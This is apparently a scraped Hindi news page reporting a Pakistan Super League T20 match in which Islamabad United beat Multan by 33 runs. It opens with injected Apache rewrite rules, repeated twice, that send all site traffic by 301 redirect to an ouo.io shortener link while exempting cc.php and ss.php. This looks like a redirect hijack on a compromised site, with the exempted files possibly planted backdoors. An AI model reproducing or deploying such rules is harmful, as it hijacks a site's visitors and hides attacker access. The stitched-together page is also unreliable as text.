
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 471
Previous Nextशारजाह। वेस्टइंडीज के मध्य क्रम के विस्फोटक बल्लेबाज किरोन पोलार्ड की तूफानी पारी के बावजूद पाकिस्तान सुपर लीग (पीएसएल) में मुल्तान को इस्लामाबाद युनाइटेड के खिलाफ 33 रन से हार का सामना करना पड़ा। कल खेले गए टी20 टूर्नामेंट के इस मुकाबले में 186 रन के लक्ष्य का पीछा करते हुए मुल्तान की टीम 19.1 ओवर में 152 रन पर ढेर हो गई। पोलार्ड ने 47 गेंदों पर पांच चौकों और छह छक्कों की मदद से 73 रन उड़ाए। शोएब मकसूद (13), कप्तान शोएब मलिक (12), व्हाइटले (11), सोहैल तनवीर (10) व उमर गुल (10) भी दोहरे अंकों में पहुंचे, लेकिन कोई भी इसे बड़ी पारी में नहीं बदल पाया। विकेटकीपर कुमार संगकारा 1 व अहमद शहजाद 3 रन पर ही आउट हो गए। समित पटेल, फहीम अशरफ, अमाद बट व शादाब खान ने 2-2 और मोहम्मद सामी ने एक विकेट लिया। इस जीत के साथ इस्लामबाद के 8 मैच में 6 जीत से 12 अंक हो गए हैं और वह छह टीमों के इस टूर्नामेंट में प्लेऑफ में पहुंच गया है। इससे पहले इस्लामाबाद ने पहले बल्लेबाजी करते हुए चार विकेट पर 185 रन बनाए। मैन ऑफ द मैच विकेटकीपर ल्यूक रोंची ने 36 गेंदों पर छह चौकों व तीन छक्कों की मदद से 58 रन बनाए। एलेक्स हेल्स ने 46, हुसैन तलत ने 36 रन का योगदान दिया। आसिफ अली 17 और फहीम अशरफ 13 रन पर नाबाद लौटे। उमर गुल ने दो और इमरान ताहिर ने एक विकेट चटकाया।